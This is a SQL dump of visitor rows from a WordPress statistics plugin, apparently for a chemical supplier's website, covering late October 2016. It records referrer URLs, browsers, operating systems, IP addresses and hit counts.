INSERT INTO `wp_statistics_visitor` VALUES (13224, '2016-10-28', 'https://www.adsensecustomsearchads.com/afs/ads?q=Food%20safe%20Teflon%20spray&adpage=1&gl=ca&ccfn=amazon_search_numbered_wide&r=m&fexp=21404&client=amazon-ca&channel=g-channel-6&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=n4&ad=n4&nocache=7301477677436622&num=0&output=uds_ads_only&v=3&bsl=10&u_his=3&u_tz=-360&dt=1477677436623&u_w=1920&u_h=1080&biw=-12245933&bih=-12245933&isw=1676&ish=1&psw=1676&psh=0&frm=2&uio=uv3-&jsv=11676&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '72.2.21.150', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13225, '2016-10-28', 'https://www.bing.com/', 'Edge', 'Windows', '13.10586', '', '192.145.254.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13226, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0ahUKEwiAsY3Qiv7PAhXFNSYKHTkrBOAQFghJMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-908.pdf&usg=AFQjCNGMwC1YiF8tKnuKAcynxpLvmtIiVg&sig2=ueG4rgunJRfDMBCFn5N0ag', 'MSIE', 'Windows', '11.0', '', '71.43.202.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13227, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.27.171.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13228, '2016-10-28', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '96.243.44.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13229, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.202.218.67', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13230, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwjv8Yy3jf7PAhWM24MKHV4JAyEQFgg3MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '12.216.216.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13231, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '72.45.227.58', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13232, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.8.52.123', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13233, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13234, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13235, '2016-10-28', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwictITljf7PAhUj5oMKHcczBaAQFgg5MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=QXDqZTOqlqxH-2BJyh311Q', 'MSIE', 'Windows', '11.0', '', '205.237.44.59', '000', 41, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13236, '2016-10-28', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '41.0.2353.46', '', '142.68.66.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13237, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '142.68.66.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13238, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '98.192.3.200', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13239, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '104.160.13.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13240, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.160.13.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13241, '2016-10-28', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '104.160.13.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13242, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '96.18.147.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13243, '2016-10-28', 'https://www.google.com.pe/', 'Chrome', 'Windows', '54.0.2840.71', '', '190.234.43.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13244, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.56.14.79', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13245, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '97.105.182.138', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13246, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '71.235.108.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13247, '2016-10-28', 'https://www.miller-stephenson.com/product/conformal-coating-stripper/', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13248, '2016-10-28', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.234.42.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13249, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13250, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13251, '2016-10-28', 'https://www.miller-stephenson.com/miller/krytox.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13252, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13253, '2016-10-28', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13254, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjixezJnf7PAhVLQyYKHWswBqUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '10.97.10.101', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13255, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '208.46.106.5', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13256, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13257, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '165.156.25.5', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13258, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.14.86.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13259, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '20.0', '', '204.14.86.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13260, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '64.21.205.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13261, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjp2vTwnv7PAhXjyVQKHb8XC8EQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=aLF91tz9cnmlWl8OZJLppw', 'MSIE', 'Windows', '11.0', '', '192.198.250.42', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13262, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '217.118.81.17', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13263, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '12.173.68.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13264, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '98.195.129.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13265, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '35.2.167.60', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13266, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '75.147.17.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13267, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '69.37.242.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13268, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13269, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '205.243.112.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13270, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '14.0.835.202', '', '104.188.249.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13271, '2016-10-28', 'https://id.mschem.com/miller/pdf/MS-555,%20557.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '198.233.251.235', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13272, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.63.28.252', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13273, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.14.180.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13274, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '38.88.146.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13275, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiYpJKgov7PAhXiq1QKHeyeBIsQFghDMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-203%2F&usg=AFQjCNEWZL-xirGR2lK6d3vEfIQPq6i1cA', 'MSIE', 'Windows', '11.0', '', '98.191.100.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13276, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.92.244.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13277, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13278, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '165.231.92.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13279, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '165.231.92.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13280, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13281, '2016-10-28', 'https://www.google.com/search?client=safari&rls=en&q=curing+agent+epicure+W&ie=UTF-8&oe=UTF-8', 'Safari', 'Macintosh', '5.1.9', '', '107.185.29.144', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13282, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '76.245.5.26', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13283, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi2_vjTnf7PAhXDYX4KHTjYCagYABAA&sig=AOD64_0s-WeMHjr8bKe6c2PNG2jMrziE1Q&rct=j&q=&ved=0ahUKEwjE0PXTnf7PAhXEwlQKHXSFBcMQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '71.110.123.63', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13284, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '70.198.34.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13285, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '58.65.176.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13286, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.46.50.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13287, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13288, '2016-10-28', 'https://www.bing.com/search?q=Polyphenyl+Ether+Lubricant&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13289, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/connector-lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13290, '2016-10-28', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13291, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '186.202.95.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13292, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '99.144.130.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13293, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '72.76.243.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13294, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '107.161.24.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13295, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.89.232.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13296, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.4.219.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13297, '2016-10-28', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.111', '', '177.87.104.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13298, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '97.74.215.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13299, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '68.3.15.66', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13300, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/epon-elastomer-modified-epoxy-resins/', 'Safari', 'iPhone', '7.0', '', '199.30.25.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13301, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '77.247.147.14', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13302, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.221.7.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13303, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.71.190.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13304, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '75.140.184.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13305, '2016-10-28', 'https://forums.pelicanparts.com/911-engine-rebuilding-forum/284737-complete-engine-sealant-thread-16.html', 'Edge', 'Windows', '14.14393', '', '78.27.96.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13306, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '87.197.145.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13307, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.45.193.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13308, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '94.102.9.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13309, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '96.2.194.66', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13310, '2016-10-28', 'https://www.miller-stephenson.com', 'BlackBerry Browser', 'BlackBerry', '10.3.2.858', '', '107.77.97.18', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13311, '2016-10-28', 'https://www.miller-stephenson.com/tech-support/', 'Safari', 'iPhone', '10.0', '', '96.250.80.125', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13312, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '5.153.24.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13313, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13314, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '69.161.78.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13315, '2016-10-28', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '66.162.141.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13316, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '130.101.154.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13317, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13318, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.93.168.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13319, '2016-10-28', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '202.102.99.96', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13320, '2016-10-28', 'https://www.bing.com/search?q=eponex+resin+1510&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13321, '2016-10-28', 'https://www.miller-stephenson.com/product/eponex-1510/', 'MSIE', 'Windows', '9.0', '', '204.79.180.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13322, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '67.184.96.143', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13323, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '54.0.2840.71', '', '76.88.35.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13324, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '51.0', '', '77.239.252.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13325, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13326, '2016-10-28', 'https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/', 'MSIE', 'Windows', '9.0', '', '204.79.180.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13327, '2016-10-28', 'https://www.rbot.info/link/brytyfojivygudino', 'Firefox', 'Linux', '44.0', '', '95.133.238.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13328, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '23.92.212.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13329, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13330, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '50.255.119.197', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13331, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '71.40.246.130', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13332, '2016-10-28', 'https://forum.guns.ru/forummessage/15/091409-4.html', 'Chrome', 'Windows', '54.0.2840.71', '', '95.183.110.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13333, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjNnb7aw_7PAhXDiX4KHZ0qDFwYABAA&sig=AOD64_1YEk7Mog65dfdtmeubU6tacTMj_w&rct=j&q=&ved=0ahUKEwjmmrraw_7PAhWHj1QKHXI3AZcQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '76.232.195.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13334, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13335, '2016-10-28', 'https://uytmaster.ru/top/santech', 'Opera', 'Windows', '8.00', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13336, '2016-10-28', 'https://pizda.lol/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13337, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.77.68.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13338, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Macintosh', '52.0.2743.116', '', '173.226.201.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13339, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '172.89.159.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13340, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '50.0', '', '50.35.120.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13341, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '117.253.223.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13342, '2016-10-28', 'https://www.adsensecustomsearchads.com/afs/ads?q=liquid%20flooring%20resins&adpage=1&ccfn=amazon_search_numbered_narrow_underline&r=m&fexp=21404%2C7000106&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=2&format=n5&ad=n5&nocache=5481477696646697&num=0&output=uds_ads_only&v=3&bsl=10&u_his=7&u_tz=-240&dt=1477696646698&u_w=1152&u_h=720&biw=-12245933&bih=-12245933&isw=910&ish=1&psw=910&psh=0&frm=2&uio=uv3-&jsv=11676&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '174.95.136.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13343, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13344, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '189.198.141.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13345, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '62.28.9.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13346, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13347, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Safari', 'iPhone', '7.0', '', '65.55.210.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13348, '2016-10-28', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '187.164.253.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13349, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.75.212.7', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13350, '2016-10-28', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '31.57.33.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13351, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '33.0.1750.517', '', '185.69.52.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13352, '2016-10-29', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.108.8.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13353, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '69.228.33.31', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13354, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13355, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.133.106.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13356, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.183.80.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13357, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13358, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13359, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13360, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.156', '000', 2, 0); 
